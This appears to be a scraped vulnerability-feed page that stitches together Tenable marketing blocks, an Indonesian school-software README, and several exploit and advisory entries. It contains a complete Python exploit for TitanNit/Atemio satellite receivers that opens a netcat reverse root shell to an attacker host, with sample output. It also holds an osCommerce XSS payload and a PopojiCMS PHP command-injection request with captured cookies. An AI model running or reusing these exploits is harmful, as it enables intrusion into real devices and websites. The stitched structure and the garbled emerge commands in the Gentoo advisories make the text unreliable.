[PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2023-36

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Products

Control iD iDSecure v4.7.32.0

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Learn How Tenable Helps Achieve SLCGP Cybersecurity Plan Requirements**

Tenable solutions help fulfill all SLCGP requirements. Connect with a Tenable representative to learn more.

CVE-2023-6329: Control iD iDSecure passwordCustom Authentication Bypass

Cross Site Scripting vulnerability in smpn1smg absis v.2017-10-19 and before allows a remote attacker to execute arbitrary code via the nama parameter in the lock/lock.php file.

**absis**

Sistem Akademik KTSP/K13

Versi 0.000001 (yang mudeng cuman developernya aja)

Masih Versi Alpha, banyak bug sana-sini dan kode yang tidak rapi. Next Version -> Sudah menggunakan framework laravel

Step:

1.  Upload data backend di server php anda.
2.  Ada 2 database yg harus anda gunakan, yaitu master dan \[tiap tahun ajaran\] (https://github.com/smpn1smg/absis/smpn1smg\_2015.sql). Yang kami berikan berupa data dummy, agar bisa digunakan. Di github.com/smpn1smg/absis.
3.  Setting agar sistem ada di root (misal langsung di http://localhost/ bukan di http://localhost/absis/
4.  Setting username dan password MySQL di controller/config/config.php dan model/class/master.php

Login demo: demo.absis.co.id username: demo pass: demo

Daftar Fitur (baik yg sudah dan yg akan):

**Lisensi**

  
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.

Hal ini berarti:

*   **Share**: Anda bebas untuk menggunakan dan mendistribusikan materi-materi ini pada media dan bentuk apapun.
*   **Adapt**: Anda bebas untuk memodifikasi materi-materi ini pada penggunaannya.

Dengan ketentuan sebagai berikut:

*   **Attribution**: Apabila Anda menggunakan materi-materi ini, Anda harus memberikan _credit_ kepada **SMPN 1 Semarang**.
*   **NonCommercial**: Anda tidak boleh menggunakan materi-materi ini untuk keperluan komersial.
*   **ShareAlike**: Apabila Anda memodifikasi materi-materi ini, Anda harus mendistribusikannya kembali dengan lisensi yang sama. Hal ini dapat dilakukan dengan cara melakukan _fork_ repositori ini dan melakukan _commit_ modifikasi-modifikasi yang Anda lakukan di sana.

Untuk penjelasan lebih lanjut mengenai lisensi ini, silakan membuka tautan lisensi di atas.

CVE-2023-49029: GitHub - smpn1smg/absis: Sistem Akademik K13/KTSP Berbasis Web

The Atemio AM 520 HD Full HD satellite receiver has a vulnerability that enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the getcommand query within the application, allowing the attacker to gain root access. Firmware versions 2.01 and below are affected.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution### Vendor: AAF Digital HD Forum | Atelmo GmbH# Product web page: http://www.aaf-digital.info | https://www.atemio.de# Affected version: Firmware <=2.01## Summary: The Atemio AM 520 HD Full HD satellite receiver enables the# reception of digital satellite programs in overwhelming image quality# in both SD and HD ranges. In addition to numerous connections, the small# all-rounder offers a variety of plugins that can be easily installed# thanks to the large flash memory. The TitanNit Linux software used combines# the advantages of the existing E2 and Neutrino systems and is therefore# fast, stable and adaptable.## Desc: The vulnerability in the device enables an unauthorized attacker# to execute system commands with elevated privileges. This exploit is# facilitated through the use of the 'getcommand' query within the application,# allowing the attacker to gain root access.## ========================================================================# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999# [*] Starting callback listener child thread# [*] Listening on port 9999# [*] Generating callback payload# [*] Calling# [*] Callback waiting: 3s# [*] ('192.168.1.13', 40943) called back# [*] Rootshell session opened# sh: cannot set terminal process group (1134): Inappropriate ioctl for device# sh: no job control in this shell# sh-5.1# id# <-sh-5.1# id# uid=0(root) gid=0(root)# sh-5.1# cat /etc/shadow | grep root# <-sh-5.1# cat /etc/shadow | grep root# root:$6$TAdBGj2mY***:18729:0:99999:7:::# sh-5.1# exit# [*] OK, bye!## _# # =======================================================================## Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)#            GNU/Linux 3.14-1.17 (armv7l)#            GNU/Linux 3.14.2 (mips)#            ATEMIO M46506 revision 990#            Atemio 7600 HD STB#            CPU STx7105 Mboard#            titan web server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5801# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php### 16.11.2023#from time import sleepimport threadingimport requestsimport socketimport sysclass RemoteControl:    def __init__(self):        self.timeout = 10        self.target = None        self.callback = None        self.cstop = threading.Event()        self.path = "/query?getcommand=&cmd="        self.lport = None        self.cmd = None    def beacon(self):        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "        self.cmd  += self.callback + " "        self.cmd  += str(self.lport) + " "        self.cmd  += ">/tmp/j"        self.path += self.cmd        r = requests.get(self.target + self.path)    def slusaj(self):        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(("0.0.0.0", self.lport))        s.listen(1)        print("[*] Listening on port " + str(self.lport))        sleep(1)        try:            conn, addr = s.accept()            print("\n[*]", addr, "called back")            print("[*] Rootshell session opened")            self.cstop.set()        except socket.timeout:            print("[-] Call return timeout\n[!] Check your ports")            conn.close()        while True:            try:                odg = conn.recv(999999).decode()                sys.stdout.write(odg)                command = input()                command += "\n"                if "exit" in command:                    exit(-17)                conn.send(command.encode())                sleep(0.5)                sys.stdout.write("<-" + odg.split("\n")[-1])            except:                print("[*] OK, bye!")                exit(-1)        s.close()    def tajmer(self):        for z in range(self.timeout, 0, -1):            poraka = f"[*] Callback waiting: {z}s"            print(poraka, end='', flush=True)            sys.stdout.flush()            sleep(1)            if self.cstop.is_set():                break            print(' ' * len(poraka), end='\r')        if not self.cstop.is_set():            print("[-] Call return timeout\n[!] Check your ports")            exit(0)        else:            print(end=' ')    def thricer(self):        print("[*] Starting callback listener child thread")        plet1 = threading.Thread(name="ZSL", target=self.slusaj)        plet1.start()        sleep(1)        print("[*] Generating callback payload")        sleep(1)        print("[*] Calling")        plet2 = threading.Thread(name="ZSL", target=self.tajmer)        plet2.start()        self.beacon()        plet1.join()        plet2.join()    def howto(self):        if len(sys.argv) != 4:            self.usage()        else:            self.target = sys.argv[1]            self.callback = sys.argv[2]            self.lport = int(sys.argv[3])            if not self.target.startswith("http"):                self.target = "http://{}".format(self.target)    def dostabesemolk(self):        naslov = """    o===--------------------------------------===o    |                                            |    | TitanNit Web Control Remote Code Execution |    |                ZSL-2023-5801               |    |                                            |    o===--------------------------------------===o                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          L!                         /_)                        / /L_______________________/ (__)_______________________  (__)                       \_(__)                          ||                          ||                          ||                          ||                          ||                          ||        """        print(naslov)    def usage(self):        self.dostabesemolk()        print("Usage: ./titan.py <target ip> <listen ip> <listen port>")        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")        exit(0)    def main(self):        self.howto()        self.thricer()if __name__ == '__main__':    RemoteControl().main()

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

osCommerce version 4 suffers from a cross site scripting vulnerability.

    # Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: CraCkEr# Date: 13/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/printshop/# Tested on: Windows 11 Home# Impact: Manipulate the content of the site# CWE: CWE-79 - CWE-74 - CWE-707# CVE: CVE-2023-6296## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /catalog/compareGET parameter 'compare[]' is vulnerable to XSShttps://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx[-] Done

osCommerce 4 Cross Site Scripting

PopojiCMS version 2.0.1 suffers from a remote command execution vulnerability.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PopojiCMS 2.0.1 Remote Command Execution

Gentoo Linux Security Advisory 202311-18 - Multiple vulnerabilities have been discovered in GLib. Versions greater than or equal to 2.74.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GLib: Multiple Vulnerabilities  
     Date: November 27, 2023  
     Bugs: #886197, #887807  
       ID: 202311-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in GLib.

Background  
=========  
GLib is a library providing a number of GNOME's core objects and  
functions.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-libs/glib  < 2.74.4      >= 2.74.4

Description  
==========  
Multiple vulnerabilities have been discovered in GLib. Please review the  
referenced CVEs for details.

Impact  
=====  
GVariant deserialization is vulnerable to an exponential blowup issue  
where a crafted GVariant can cause excessive processing, leading to  
denial of service.

GVariant deserialization fails to validate that the input conforms to  
the expected format, leading to denial of service.

GVariant deserialization is vulnerable to a slowdown issue where a  
crafted GVariant can cause excessive processing, leading to denial of  
service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GLib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/glib-2.74.4"

References  
=========  
[ 1 ] CVE-2023-29499  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29499  
[ 2 ] CVE-2023-32611  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32611  
[ 3 ] CVE-2023-32665  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32665

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-18

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-18

Ubuntu Security Notice 6515-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. It was discovered that Thunderbird did not properly manage memory when images were created on the canvas element. An attacker could potentially exploit this issue to obtain sensitive information.

=========================================================================  
Ubuntu Security Notice USN-6515-1  
November 27, 2023

thunderbird vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:  
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple security issues were discovered in Thunderbird. If a user were  
tricked into opening a specially crafted website in a browsing context, an  
attacker could potentially exploit these to cause a denial of service,  
obtain sensitive information, bypass security restrictions, cross-site  
tracing, or execute arbitrary code. (CVE-2023-6206, CVE-2023-6212)

It was discovered that Thudnerbird did not properly manage memory when  
images were created on the canvas element. An attacker could potentially  
exploit this issue to obtain sensitive information. (CVE-2023-6204)

It discovered that Thunderbird incorrectly handled certain memory when  
using a MessagePort. An attacker could potentially exploit this issue to  
cause a denial of service. (CVE-2023-6205)

It discovered that Thunderbird incorrectly did not properly manage ownership  
in ReadableByteStreams. An attacker could potentially exploit this issue  
to cause a denial of service. (CVE-2023-6207)

It discovered that Thudnerbird incorrectly did not properly manage copy  
operations when using Selection API in X11. An attacker could potentially  
exploit this issue to obtain sensitive information. (CVE-2023-6208)

Rachmat Abdul Rokhim discovered that Thunderbird incorrectly handled  
parsing of relative URLS starting with "///". An attacker could potentially  
exploit this issue to cause a denial of service. (CVE-2023-6209)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.23.10.1

Ubuntu 23.04:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.20.04.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6515-1  
  CVE-2023-6204, CVE-2023-6205, CVE-2023-6206, CVE-2023-6207,  
  CVE-2023-6208, CVE-2023-6209, CVE-2023-6212

Package Information:  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6515-1

Gentoo Linux Security Advisory 202311-17 - Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service. Versions greater than or equal to 5.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: phpMyAdmin: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #831841, #835071  
       ID: 202311-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in phpMyAdmin, the worst  
of which allows for denial of service.

Background  
=========  
phpMyAdmin is a tool written in PHP intended to handle the  
administration of MySQL over the web.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-db/phpmyadmin  < 5.2.0       >= 5.2.0

Description  
==========  
Multiple vulnerabilities have been discovered in phpMyAdmin. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All phpMyAdmin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/phpmyadmin-5.2.0"

References  
=========  
[ 1 ] CVE-2022-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0813  
[ 2 ] CVE-2022-23807  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23807  
[ 3 ] CVE-2022-23808  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23808

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-17

Gentoo Linux Security Advisory 202311-16 - Multiple denial of service vulnerabilities have been found in Open vSwitch. Versions greater than or equal to 2.17.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Open vSwitch: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #765346, #769995, #803107, #887561  
       ID: 202311-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple denial of service vulnerabilites have been found in Open  
vSwitch.

Background  
=========  
Open vSwitch is a production quality multilayer virtual switch.

Affected packages  
================  
Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
net-misc/openvswitch  < 2.17.6      >= 2.17.6

Description  
==========  
Multiple vulnerabilities have been discovered in Open vSwitch. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Open vSwitch users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openvswitch-2.17.6"

References  
=========  
[ 1 ] CVE-2020-27827  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27827  
[ 2 ] CVE-2020-35498  
      https://nvd.nist.gov/vuln/detail/CVE-2020-35498  
[ 3 ] CVE-2021-3905  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3905  
[ 4 ] CVE-2021-36980  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36980  
[ 5 ] CVE-2022-4337  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4337  
[ 6 ] CVE-2022-4338  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4338  
[ 7 ] CVE-2023-1668  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1668

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-16

Gentoo Linux Security Advisory 202311-15 - Multiple vulnerabilities have been discovered in LibreOffice, the worst of which could lead to code execution. Versions greater than or equal to 7.5.3.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibreOffice: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #908083  
       ID: 202311-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in LibreOffice, the worst  
of which could lead to code execution.

Background  
=========  
LibreOffice is a powerful office suite; its clean interface and powerful  
tools let you unleash your creativity and grow your productivity.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  ------------  
app-office/libreoffice      < 7.5.3.2     >= 7.5.3.2  
app-office/libreoffice-bin  < 7.5.3.2     >= 7.5.3.2

Description  
==========  
Multiple vulnerabilities have been discovered in LibreOffice. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibreOffice binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-bin-7.5.3.2"

All LibreOffice users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-7.5.3.2"

References  
=========  
[ 1 ] CVE-2023-0950  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0950  
[ 2 ] CVE-2023-2255  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2255

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web